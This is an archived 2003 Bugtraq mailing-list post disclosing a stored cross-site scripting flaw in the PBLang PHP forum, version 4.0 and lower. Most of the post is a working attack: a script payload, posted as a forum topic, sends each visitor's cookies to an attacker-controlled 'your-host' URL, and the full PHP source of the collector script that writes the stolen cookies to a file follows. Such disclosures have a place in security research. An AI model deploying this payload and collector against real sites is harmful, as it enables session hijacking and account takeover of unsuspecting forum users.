Bugtraq mailing list archives

PBLang Forum XSS Vul


From: Quan Van Truong Bui <quan_vu_208cn () yahoo com>
Date: 25 Jul 2003 12:54:11 -0000



PBLang is a web forum written by PHP language. A security vulnerability in 
the product allows posting of HTML code and JavaScript into existing web 
pages thus causing it to be executed on the client end (a Cross-Site 
Scripting vuln).

|--------------------------------------------|

Vulnerable systems: PBLang forum
Version:   4.0 or lower
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)

|--------------------------------------------|

If someone inserts &lt;script&gt;`anyscript`&lt;/script&gt; instead of the post’s 
content, the JavaScript code is executed by Internet Explorer or some 
other web browsers. This allows stealing of cookie data and other 
interesting things… 

Exploit:

Inserting a new topic (or reply) with the following script, it will send 
visitor's cookies to your host. The output is saved to http://your-
host/cookie.txt 

*--------------------------------------------------------------------------
-------------------

&lt;script&gt;window.open("http://your-host/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")&lt;/script&gt;

---------------------------------------------------------------------------
------------------*

Or insert every scripts – Java and HTML (ex: javascript:history.go(-1), 
window.write(‘Hello world’), javascript:alert(‘Hi!!!’)… )


* Code of docs.php:*

*-------------------------------------------------docs.php-----------------
-------------------------------
<?php
//Copyright by W_Hat (www.pcworldvn.com)
define ("LINE", "\r\n");
define ("HTML_LINE", "<br>"); 
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
} 
// get current date
$now = date("Y-m-d H:i:s"); 
// init
$myData = "[-----$now-----]" . LINE; 
// get
$myData .= getvars($HTTP_GET_VARS, ""); 
// file
$file = $REMOTE_ADDR . "cookie.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>
-------------------------------------------------docs.php------------------
------------------------------*


Name: Quan Van Truong
E-Mail: quan_vu_208cn () yahoo com
Occupation: Bug Hunter


Current thread: